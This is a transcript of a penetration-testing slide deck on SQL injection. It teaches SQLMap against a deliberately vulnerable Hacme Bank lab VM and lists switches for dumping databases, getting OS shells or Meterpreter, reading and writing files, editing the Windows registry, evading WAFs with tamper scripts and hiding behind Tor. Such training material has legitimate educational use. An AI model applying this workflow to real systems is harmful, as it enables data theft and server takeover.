This document provides an overview of SQL injection and how to use the SQLMap tool to exploit SQL injection vulnerabilities. It begins with background on SQL injection as the first OWASP Top 10 vulnerability. It then explains how SQL injection works and common techniques. The bulk of the document focuses on using SQLMap to identify and exploit SQL injection flaws, including enumerating databases, tables, columns, and extracting data. It describes options to escalate access using SQLMap to interface with the operating system and access the file system and registry. Tamper scripts for bypassing web application firewalls are also discussed. The goal is to achieve "one click 0wnage" of systems with SQL injection vulnerabilities using SQLMap's powerful features.

1. SQL INJECTION
One Click 0wnage using SQL Map
By:
Taufiq Ali

2. LAB SETUP
 VM with Hacme Bank Installed
 http://ninja-sec.com/index.php/hacme-bank-prebuilt-vmware-image-ninja-
sec-com/
 On Windows latest version of Python
 SQLMap For Windows
 https://github.com/sqlmapproject/sqlmap/zipball/master
 SQLMap For *nix
 It is there on BT5
2

3. OWASP TOP 10
A1 : Injection
 Injection flaws, such as SQL, OS, and LDAP injection,
occur when untrusted data is sent to an interpreter as
part of a command or query. The attacker’s hostile data
can trick the interpreter into executing unintended
commands or accessing unauthorized data.

4. INJECTIONS
 Common type of injections :
 SQL
 LDAP
 Xpath
 Etc.
 Impact
 As disastrous as handling the database over to the attacker
 Can also lead to OS level access

5. DEFINITION
 Exploiting poorly filtered or in-correctly escaped SQL
queries to parse (execute) data from user input
 Major Classes
 Error Based
 Blind Injections
 Boolean Injections
 Etc.
5

6. HOW DOES IT WORK?
 Application presents a form to the attacker
 Attacker sends an attack in the form data
 Application forwards attack to the database in a SQL query
 Database runs query containing attack and sends encrypted
result back to application
 Application renders data as to the user

7. VULNERABLE CODE

8. SQL MAP
0wnage 0wange 0wnage..

9. SQL MAP INTRODUCTION
 Powerful command line utility to exploit SQL Injection
vulnerability
 Support for following databases
 MySQL  IBM DB2
 Oracle  SQLite
 PostgreSQL  Firebird
 Microsoft SQL Server  Sybase and
 Microsoft Access  SAP MaxDB

10. SQL INJECTION TECHNIQUES
 Boolean-based blind
 Time-based blind
 Error-based
 UNION query
 Stacked queries
 Out-of-band
10

11. KEY SQL MAP SWITCHES
 -u <URL>
 --cookie (Authentication)
 -dbs (To enumerate databases)
 - r (For request in .txt file)
 -technique (SQL injection technique)
 - dbms (Specify DBMS)
 -D <database name> --tables
 -T <table name> --columns
 -C <column name> --dump
 --dump-all (for lazy l33t people)

12. SQL MAP FLOW
 Enumerate the database name
 Select database and enumerate tables
 Select tables and enumerate columns
 Select a column and enumerate rows(data)
 Then choose your way in

13. WHY 0WNING THE ENTERPRISE?
 Built in capabilities for cracking hashes
 Options of running user defined queries
 You could run OS level commands
 You could have an interactive OS shell
 Meterpreter shell with Metasploit
13

14. OPTIONS FOR 0WNING ENTERPRISE
 --os-cmd
 Run any OS level command
 --os-shell
 Starts an interactive shell
 --os-pwn
 Injects a Meterpreter shell
 --tamper
 Evading WAF
14

15. SQL MAP ++
 --tor: Use Tor anonymity network
 --tor-port: Set Tor proxy port other than default
 --tor-type: Set Tor proxy type (HTTP - default, SOCKS4 or
SOCKS5)
 --check-payload: Offline WAF/IPS/IDS payload detection testing
 --check-waf: heck for existence of WAF/IPS/IDS protection
 --gpage: Use Google dork results from specified page number
 --mobile: Imitate smartphone through HTTP User-Agent header
 --smart: Conduct through tests only if positive heuristic(s)
 --tamper: custom scripts
15

16. SQL MAP ++ - FILE SYSTEM ACCESS
 These options can be used to access the back-end database
management system underlying file system
 --file-read=RFILE: Read a file from the back-end DBMS file
system
 --file-write=WFILE: Write a local file on the back-end
DBMS file system
 --file-dest=DFILE; Back-end DBMS absolute filepath to write
to
16

17. SQL MAP ++ - OPERATING SYSTEM ACCESS
 These options can be used to access the back-end database management
system underlying operating system
 --os-cmd=OSCMD - Execute an operating system command
 --os-shell - Prompt for an interactive operating system shell
 --os-pwn - Prompt for an out-of-band shell, meterpreter or VNC
 --os-smbrelay - One click prompt for an OOB shell, meterpreter or VNC
 --os-bof - Stored procedure buffer overflow exploitation
 --priv-esc - Database process' user privilege escalation
 --msf-path=MSFPATH Local path where Metasploit Framework is installed
 --tmp-path=TMPPATH Remote absolute path of temporary files directory
17

18. SQLMAP ++ -WINDOWS REGISTRY ACCESS
 These options can be used to access the back-end database
management system Windows registry
 --reg-read - Read a Windows registry key value
 --reg-add - Write a Windows registry key value data
 --reg-del - Delete a Windows registry key value
 --reg-key=REGKEY - Windows registry key
 --reg-value=REGVAL - Windows registry key value
 --reg-data=REGDATA - Windows registry key value data
 --reg-type=REGTYPE - Windows registry key value type
18

19. TAMPER SCRIPTS – BYPASSING WAF
 Located inside the tamper folder in SQLMap
 space2hash.py and space2morehash.py (MySQL)
 space2mssqlblank.py and space2mysqlblank.py (MSSQL)
 charencode.py and chardoubleencode.py (Different
Encodings)
 charunicodeencode.py and percentage.py (To hide payload
against ASP/ASP.NET applications)
19

20. WHAT YOU SHOULD EXPLORE
 One Click Ownage with SQL Inection
 www.mavitunasecurity.com/s/research/OneClickOwnage.pdf
 SQL Map with TOR
 http://0entropy.blogspot.in/2011/04/sqlmap-and-tor.html
 SQL MAP Usage Guide
 http://sqlmap.sourceforge.net/doc/README.html
20

21. One click 0wnage
THANK YOU!
21